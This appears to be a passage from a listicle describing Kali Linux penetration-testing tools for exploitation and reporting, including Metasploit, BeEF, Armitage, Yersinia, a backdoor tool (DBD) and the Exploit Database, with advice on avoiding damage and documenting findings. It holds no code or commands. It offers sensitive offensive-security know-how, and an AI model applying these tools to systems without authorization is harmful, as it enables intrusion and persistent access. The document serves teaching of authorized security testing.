Exploitation is the proof of all the work you’ve done in mapping the system and opening the doors. Even more so than before, you must be careful not to permanently damage any systems you are testing. Make note and document that they could have been damaged, and when the time comes to present your findings, be clear and honest about the state of security. 

Doing permanent damage to a system is a quick way for a professional penetration tester to find himself unemployed and unemployable.

14. Metasploit Framework

The Metasploit Framework, run through the Metasploit Framework Console, is among the most advanced tools in the Kali Linux arsenal. The Metasploit team is legendary, and their work in the offensive infosec field is without parallel. Kali Linux itself was based on developing an OS that incorporated all the tools of Metasploit and BackTrack together.

Metasploit itself could be considered an all-in-one penetration testing tool, and for many it still is. Of all the tools in this list, only Burp Suite comes close to the robustness and polish that Metasploit offers, and the Burp Suite tools are a distant second when compared to the depth of Metasploit's toolkit. Truly the top of the line for a dedicated offensive security professional.

Metasploit offers tools that can be used in every phase of a penetration test, from passive information gathering tools to vulnerability scans. The most exciting portion of the toolkit comes at exploit payload development and delivery.

15. The Browser Exploitation Framework (BeEF)

BeEF is an excellent tool for exploiting vulnerabilities in the browser and browser cached information blocks. At the time of writing the BeEF tool in Kali Linux is still being smoothed out, with a couple of errors and some general usability issues being touched up.

BeEF specializes in client-side attacks, focusing on the web browser itself. No other tool on this list has reached the level of usability and specialization in specific location attacks as BeEF. With special methods of attacking a web browser, BeEF allows the attacker to hit the system directly from a security vector often overlooked by defensive development teams.

16. Armitage

Ignoring the quirky anime style of the website, Armitage is actually a very advanced tool for finding and executing exploits to allow the penetration testing team to gain access to a network. Bundled with Metasploit, Armitage is not the script-kiddie plaything it appears to be stylistically, but is actually advanced enough for professional environments.

With built in automation of many different attacks, and options to find and exploit several attack vectors on the same target, Armitage is a quality weapon in the arsenal even if it is branded in a peculiar way.

17. Yersinia

A relatively old tool launched by the S21Sec team in 2005, Yersinia has returned to popularity as a reliable tool that attacks Layer 2 network systems. Instead of more traditional attacks like ARP poisoning or cache attacks, Yersinia is able to go after switches and hubs.

With many networks having limited defenses and poorly organized or configured networking hardware, Yersinia is a prime example of a tool striking where your target is weakest. Further, as most defensive security tools guard web portals, databases and workstations, Yersinia is working in an environment where noise is the standard and detection is generally weaker.

18. Durandal’s Backdoor (DBD)

DBD is a new and often overlooked tool used to maintain access to compromised systems. This is an absolutely essential part of a successful penetration test, especially in light of recent high profile attacks on Home Depot and Target where attackers stayed in the system for weeks after gaining access. DBD currently operates only over TCP/IP.

Reconnection testing is a less exciting part of exploitation, but key to making sure defensive systems have had their problems actually solved. Successful DBD testing will make sure the security hole was actually closed, instead of simply throwing the attackers out while leaving the door open.

19. Exploit Database (EDB)

While not directly an offensive exploit tool, the exploit database built into Kali Linux is the best location for the most up-to-date exploits available. Maintained by the Kali Linux, Metasploit, and Offensive Security teams, EDB is possibly the best place on the internet to find exploits in any number of areas. Searchable by description, author, platform, type, language or port, EDB is currently holding over 30,000 known exploits at the time of writing.

Phase Five


20. RecordMyDesktop

While working with all the above tools, we leap over the line from safe to illegal and work directly with tools that could easily break a business. The point of a penetration test is to attack an environment in a controlled way so the defenders can have accurate and honest information on their weaknesses. Offensive security is a defensive tool. As flashy as exploits may be, everything in your offensive arsenal comes down to a simulated attack. Wargaming is only as good as the lessons learned at the end.

RecordMyDesktop is the least technical tool on this list, but in my opinion, the most important. Showing exactly how an exploit worked, and having a clear and objective record of the attack taking place will be essential for the analysis and cleanup stages after the penetration test has completed. Remember to ask questions when in doubt. The tools listed here can be used for great evil, and that’s exactly why they were included. Knowing the enemy is half the battle.

Keep yourself safe, and happy hacking.
